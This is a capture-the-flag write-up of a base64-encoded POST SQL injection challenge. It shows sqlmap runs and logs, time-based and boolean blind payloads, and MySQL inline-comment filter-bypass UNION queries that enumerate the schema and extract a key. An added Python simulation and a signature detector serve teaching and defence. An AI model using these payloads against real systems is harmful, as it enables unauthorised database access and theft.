Scrolling through the group, a friend had posted a POST-type SQL injection challenge. A quick look at the captured request showed that the challenge base64-encodes the input before the SQL statement is executed. To learn how SQL injection challenges are set and solved, and because work was not very busy, I spent some time playing with it, hahahahahahaha
http://104.224.169.128/tasks/web12.php
```html
<script language="javascript">
function onSearch()
{
    // Read the visible field, base64-encode it into the hidden inputText field, then submit
    var pwd = document.forms[0].inText.value;
    $.base64.utf8encode = true;
    document.forms[0].inputText.value = $.base64.encode(pwd);
    document.forms[0].submit();
}
</script>
```
**Thought process:**
First, capture the request and feed it to sqlmap; Firefox's HackBar is enough for this. It is obvious that the form has a hidden field whose submitted content has been base64-encoded; challenges of this kind are mostly built that way to force contestants to test by hand. At first I thought this could not trouble sqlmap: just capture the request and add the --tamper base64encode tamper script. Later I found it could only read the database name. Adding -v 5 to get the detailed payload showed it was still deciding with sleep()-based time blind injection; what the hell?
0x01 SQLMAP:
First test: list the database name
```text
inText=1111&inputText=JyBBTkQgNTY3MD1JRigoT1JEKE1JRCgoSUZOVUxMKENBU1QoREFUQUJBU0UoKSBBUyBDSEFSKSwweDIwKSksMTIsMSkpPjEpLFNMRUVQKDUpLDU2NzApIEFORCAnRkt6SScgTElLRSAnRkt6SQ%3D%3D
```
```text
[18:39:54] [TRAFFIC IN] HTTP response [#4613] (200 OK):
Content-length: 1215
Content-language: zh-CN
Uri: http://104.224.169.128:80/tasks/web12.php
Server: Apache/2.2.15 (CentOS) DAV/2
Connection: close
Date: Tue, 19 Apr 2016 10:39:53 GMT
Content-type: text/html

[18:39:55] [INFO] retrieved: injecttest2
[18:39:55] [DEBUG] performed 95 queries in 694.98 seconds
current database: 'injecttest2'
[18:39:55] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\104.224.169.128'
```
Second test: no table names found
Full output obtained after adding -v
```text
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
available databases [1]:
[*] injecttest2

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
No tables found

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
No tables found
```
The payload extracted from sqlmap
```sql
' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),12,1))>1),SLEEP(5),5670) AND 'FKzI' LIKE 'FKzI
```
0x02 Manual testing
Big deal, at worst I close the single quote of the SQL statement by hand and inject. Hmph hmph;
(1) Local testing
I worked through sqlmap's payload and looked up how the IF(), ORD(), MID(), IFNULL() and CAST() functions are used;
I simplified sqlmap's sleep()-based approach into a true/false form: compare the length of the page content returned against the AND 5670=5670 case to decide whether an injection exists, then guess the database name by blind injection. The local test results are as follows;
```sql
mysql> select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5671,5670);
+----------------------+-----------------+
| the_flag_content     | the_value123456 |
+----------------------+-----------------+
| flags{Hello,Iamflags | 1               |
| flags2(hello,test)   | 2               |
+----------------------+-----------------+
2 rows in set (0.00 sec)

mysql> select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5670,5671);
Empty set (0.00 sec)
```
Check the length of the database name;
```sql
select * from the_flag_table where the_flag_content like '%' union select (LENGTH((IFNULL(CAST(DATABASE() AS CHAR),0x20)))>11),222--
```
Use the MID() function to check whether the ASCII code at each position is correct;
```sql
' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),N,1))>105),5670,5671)--
```
**Result:** database: injecttest2; user: injectuser2@localhost
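To see what the 95 sleep-based queries in the sqlmap log were doing, and why one true/false answer per request is enough to recover a name, here is an added simulation (not code from the original post): it answers the page's ORD(MID(...))>N and LENGTH(...)>N comparisons from a local string, assumed to be injecttest2, and counts the requests the inference costs, which is the request volume a defender sees in the access log.

```python
# Constructed stand-in for the back end (added example, not the challenge's
# code): the target evaluated these comparisons against DATABASE() and leaked
# one bit per request (rows vs. no rows, or sleep vs. no sleep). Here the same
# comparisons are answered from a local string, so nothing leaves the process.
LOCAL_DATABASE_NAME = "injecttest2"   # the value the page recovered
PROBES_SENT = []                      # one entry per simulated request

def length_gt(n: int) -> bool:
    """Emulates LENGTH(IFNULL(CAST(DATABASE() AS CHAR),0x20))>n from the union query above."""
    PROBES_SENT.append(("length", n))
    return len(LOCAL_DATABASE_NAME or " ") > n

def ord_gt(pos: int, threshold: int) -> bool:
    """Emulates ORD(MID(IFNULL(CAST(DATABASE() AS CHAR),0x20),pos,1))>threshold.
    MID() is 1-based; past the end it yields '' and MySQL's ORD('') is 0."""
    PROBES_SENT.append(("ord", pos, threshold))
    ch = (LOCAL_DATABASE_NAME or " ")[pos - 1:pos]
    return (ord(ch) if ch else 0) > threshold

def infer_length(max_len: int = 64) -> int:
    """Binary search on the one-bit length oracle (the page did this by hand with >11)."""
    lo, hi = 0, max_len
    while lo < hi:                 # invariant: lo <= true length <= hi
        mid = (lo + hi) // 2
        if length_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def infer_char(pos: int) -> str:
    """Binary search over 0..255 with the ord oracle: exactly 8 requests per character."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if ord_gt(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def infer_database_name() -> str:
    """Recover the name the way an inference loop does; PROBES_SENT afterwards
    holds the number of requests a defender would find in the access log."""
    del PROBES_SENT[:]
    length = infer_length()
    return "".join(infer_char(i) for i in range(1, length + 1))

if __name__ == "__main__":
    print(infer_database_name(), len(PROBES_SENT), "requests")
```

With an 11-character name this costs 8 requests per character plus 6 for the length, which is why even a short value produces a burst of near-identical POSTs differing only in the threshold digits.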
(2) And then it was all for nothing:
While my IF-function injection testing was in full swing, a young guy in the group suddenly pointed out that this kind of IF-function injection can only query DATABASE(), USER() and VERSION(); even if you can query those, you cannot query across tables, cannot cross tables, cannot, cannot...;
At that moment I was devastated...
0x03 Keyword bypass testing:
Back to the old road: collect articles on bypassing MySQL injection filters, work out what is being detected, and reason about the detection logic;
(1) some keyword in the SQL statement is filtered, such as union, select, etc.;
(2) special symbols are filtered, such as spaces, single quotes, equals signs, etc.;
(3) a certain string is filtered;
Testing keywords and symbols one at a time did not trigger the detection policy, but entering "' union select 1-- " did trigger it;
I picked related articles at random and tested them one by one. Following the IDS/WAF bypass methods described in the two articles below, I found that inline comments could bypass the detection. Since the injection point is already base64-encoded, the encoding tricks in those articles can be set aside:
"An in-depth look at SQL injection bypassing WAFs and filtering mechanisms" (《深入了解SQL注入繞過waf和過濾機制》)
http://drops.wooyun.org/tips/968
Avoiding Keywords
http://websec.ca/kb/sql_injection
Inline-comment payload
Below are the payloads from my inline-comment process;
Field description
Database name: injecttest2
Database name, hex-encoded: 696e6a6563747465737432
Table names: article, __key___in__this
"__key___in__this" table name, hex-encoded: 0x5f5f6b65795f5f5f696e5f5f74686973
Column: keystr
Content retrieved: Key:d8b3bc4ecd8791fb
```sql
' order by 3--
```
**Database name**
```sql
' /*!union*/ /*!select*/ version(),2,3--
'/*!union*/ /*!select*/ (/*!select*/ schema_name from information_schema.schemata limit 1,1),2,3--
```
**Table name**
```sql
' /*!union*/ /*!select*/ (/*!select*/ table_name from information_schema.tables where table_schema=0x696e6a6563747465737432 /*!*/limit 1,1),2,3--
```
**Column name**
```sql
'/*!union*/ /*!select*/ (/*!select*/ column_name from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 limit 0,1),2,3--
```
**Flag retrieval**
```sql
' /*!union*/ /*!select*/ (/*!select*/ keystr from __key___in__this limit 0,1),2,3--
```
Dumbfounded
While testing, someone else also got past it with another comment style, so I am adding that process too. Below are three example screenshots;
```sql
' order by 3--
' union select/*!*/1,2,3--
```
**Database name**
```sql
' union select/*!*/(select/*!*/schema_name from information_schema.schemata limit 0,1),2,3--
' union select/*!*/(select/*!*/schema_name/*!*/from information_schema.schemata/*!*/limit 1,1),2,3--
```
**Table name**
```sql
'union select/*!*/(select/*!*/table_name/*!*/from information_schema.tables where table_schema=0x696e6a6563747465737432/*!*/limit 1,1),2,3--
```
**Column name**
```sql
' union select/*!*/(select/*!*/column_name/*!*/from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 /*!*/limit 0,1),2,3--
```
**Flag retrieval**
```sql
'union select/*!*/(select/*!*/keystr/*!*/from __key___in__this/*!*/limit 0,1),2,3--
```
Payload
```text
inText=1&inputText=%JyB1bmlvbiBzZWxlY3QvKiEqLyhzZWxlY3QvKiEqL3NjaGVtYV9uYW1lLyohKi9mcm9tLyohKi9pbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEvKiEqL2xpbWl0LyohKi8xLDEpLDIsMy0tIC0=
```
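Both the base64-encoded blind payloads from 0x01/0x02 and the inline-comment bypass from 0x03 get past a filter that only matches the raw request body. The added detector below (example code, not part of the original post or the challenge) decodes the form's inputText field and strips MySQL's /*!...*/ wrappers before matching; the request bodies are constructed here from payloads quoted on this page, and the signature names are my own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Constructed request bodies in the shape the challenge form submits
# (inText=<typed text>&inputText=<base64 of the same text>); the plaintext
# payloads are the ones quoted on this page and are base64-encoded here.
def form_body(value: str) -> str:
    return urlencode({"inText": "1", "inputText": base64.b64encode(value.encode()).decode()})

SAMPLES = {
    "benign": form_body("hello world"),
    "sqlmap_blind": form_body("' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),12,1))>1),SLEEP(5),5670) AND 'FKzI' LIKE 'FKzI"),
    "inline_comment": form_body("' /*!union*/ /*!select*/ (/*!select*/ keystr from __key___in__this limit 0,1),2,3--"),
    "empty_comment": form_body("' union select/*!*/(select/*!*/schema_name/*!*/from information_schema.schemata/*!*/limit 1,1),2,3--"),
}
# MySQL executes the body of a /*!...*/ (or /*!50000...*/) comment, so the
# wrapper is dropped and its body kept; an ordinary /*...*/ is just whitespace.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("time-based-blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("char-by-char-probe", re.compile(r"\b(ord|ascii)\s*\(\s*(mid|substr(ing)?)\s*\(", re.I)),
]

def normalize(sql_fragment: str) -> str:
    """Rewrite the fragment the way the database will read it, then match on that."""
    text = VERSIONED_COMMENT.sub(r" \1 ", sql_fragment)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()

def decode_input_text(body: str):
    """The inputText field, base64-decoded; None if it is missing or not valid base64."""
    field = parse_qs(body).get("inputText")
    if not field:
        return None
    try:
        return base64.b64decode(field[0], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def classify(body: str) -> list:
    """Names of the signatures that fire on the decoded and normalized field."""
    raw = decode_input_text(body)
    if raw is None:
        return []
    return [name for name, rx in SIGNATURES if rx.search(normalize(raw))]
```

A body whose inputText is not valid base64 is deliberately left unclassified rather than raising, so the check can sit in front of the real handler without becoming a new way to error it out.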
Related example:
[WeiPhone (威鋒) official app SQL injection (sqlmap with a fully base64-encoded POST body)]
http://www.wooyun.org/bugs/wooyun-2010-0177954